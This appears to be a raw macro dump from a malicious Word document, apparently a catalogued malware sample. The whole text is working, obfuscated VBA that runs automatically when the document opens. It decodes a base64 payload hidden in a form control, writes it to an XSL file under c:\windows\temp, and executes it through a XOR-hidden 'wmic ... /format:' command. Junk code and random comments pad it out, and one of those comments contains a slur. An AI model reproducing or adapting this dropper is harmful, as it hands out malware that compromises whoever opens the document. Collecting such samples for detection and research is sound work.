Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
main
End Sub
Attribute VB_Name = "aNurp"
Public Sub aWrHPs(a2dRUf)
If aBm5DT = False Then
aBm5DT = True
Else
aBm5DT = False
End If

Dim a8LVr As Long
Dim aT1wu As Document
Set aT1wu = ActiveDocument
a8LVr = aT1wu.ActiveWindow.Panes(1).Pages.Count
' Piedmont yemen coins thirty-one
Set aTagSW = CreateObject("Scripting.FileSystemObject")
Dim aLtR8Z As Long
Dim aYwtQ9 As Document
Set aYwtQ9 = ActiveDocument
aLtR8Z = aYwtQ9.ActiveWindow.Panes(1).Pages.Count
If aH51k = False Then
aH51k = True
Else
aH51k = False
End If
' Linear spatial stolid
Set arWwx = aTagSW.CreateTextFile(aipHkK & "dows\\temp\\" & "\a5E3vt.xsl", 1)
arWwx.Write a2dRUf
arWwx.Close
End Sub
Attribute VB_Name = "aSDAg4"
Function aYyAbR(aa3u4 As String)
Dim aHvZLK
aHvZLK = 11396 * 1

Set aBpocO = CreateObject("MSXML2.DOMDocument")

Set aZNQj = aBpocO.createElement("b64")
aZNQj.DataType = "bin.base64"
aZNQj.Text = aa3u4
aYyAbR = StrConv(aZNQj.nodeTypedValue, vbUnicode)

End Function
Attribute VB_Name = "aT4sC"
Public Const aipHkK As String = "c:\\win"
Function aPzKU(a0qrS, aqn52, a1vMz)

Dim aRqWIC As Long
aRqWIC = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
' Ana compression demolished variables tax diseases
aPzKU = a0qrS Xor aqn52
End Function
Function aHKmX(aU4PAI, a92Tnh)
Dim alZq8
Dim aHa6x As Integer
alZq8 = 14742 / 126
aHa6x = 21
azLcK9 = alZq8 / aHa6x
' Court states domesticated
Dim aFvufl As Integer
Dim ay1HR
aFvufl = 413 - 375
ay1HR = 33
axM8zI = aFvufl * ay1HR
' Wave chrysler wasp
If apxAF = False Then
apxAF = True
Else
apxAF = False
End If
' Faggot wishlist swim capitalist
atbTc8 = vbNullString
amMJG = Not (amMJG)
' Undefiled sensors vegetarian denver ham restitution
aXaSA = UBound(aU4PAI)
For aZg20 = 0 To aXaSA
atbTc8 = atbTc8 & Chr(aPzKU(aU4PAI(aZg20), a92Tnh, "aVfcWt"))
Next
aHKmX = atbTc8
End Function
Sub adWkFu(aZ2ORV)

Dim acZJd4 As Long
acZJd4 = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
' Nape sooty

Dim aKiIpm As Long
aKiIpm = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
asVC9 = Not (asVC9)
VBA.Interaction.Shell@ aZ2ORV
Dim a80EJu As Integer
Dim a6H18
a80EJu = 9317 / 121
a6H18 = 24516 / 908
athoF = a80EJu * a6H18
' Unwieldy start

End Sub
Attribute VB_Name = "abAvhF"
Sub main()
Dim aAWUB As Long
With ActiveDocument
aAWUB = .ActiveWindow.Panes(1).Pages.Count
End With
' Shanghai brackish
Dim aKsx6 As Long
With ActiveDocument
aKsx6 = .ActiveWindow.Panes(1).Pages.Count
End With
' Grandpa views
Dim adL6nm As String
Dim akEdIZ
For akEdIZ = 17 To 38
Debug.Print Error(akEdIZ)
Next akEdIZ
' Vedic
auVYM = Array(55, 45, 41, 35, 96, 48, 50, 47, 35, 37, 51, 51, 96, 44, 41, 51, 52, 96, 111, 38, 47, 50, 45, 33, 52, 122, 98, 35, 122, 28, 55, 41, 46, 36, 47, 55, 51, 28, 52, 37, 45, 48, 28, 33, 117, 5, 115, 54, 52, 110, 56, 51, 44, 98)
aGD7T = Not (aGD7T)
' Wheres seek db flail
aEMILW = 456 - 392
Dim aLkmCz As Integer
aLkmCz = 33878 / 2
adL6nm = aHKmX(auVYM, aEMILW)
Dim amecV As Long
With ActiveDocument
amecV = .ActiveWindow.Panes(1).Pages.Count
End With
Dim abkfy As Long
With ActiveDocument
abkfy = .ActiveWindow.Panes(1).Pages.Count
End With
' Katharine
aWrHPs aYyAbR(aeW6sM.a.value)
Call adWkFu(adL6nm)
Dim a0oEb
a0oEb = 2300 + 14
' Forearm holly memorabilia
Dim a03Jj
For a03Jj = 31 To 49
Debug.Print Error(a03Jj)
Next a03Jj
' Practices polynesia eclipse
Dim aZzgxv As Long
With ActiveDocument
aZzgxv = .ActiveWindow.Panes(1).Pages.Count
End With
' Atomic bubbles

End Sub
Attribute VB_Name = "aeW6sM"
Attribute VB_Base = "0{DA200A26-469C-45B3-B2AF-8C3CDA72E15D}{E0BEC9C5-7ABF-457E-81A5-EA2D25632CB3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


INQUEST-PP=macro
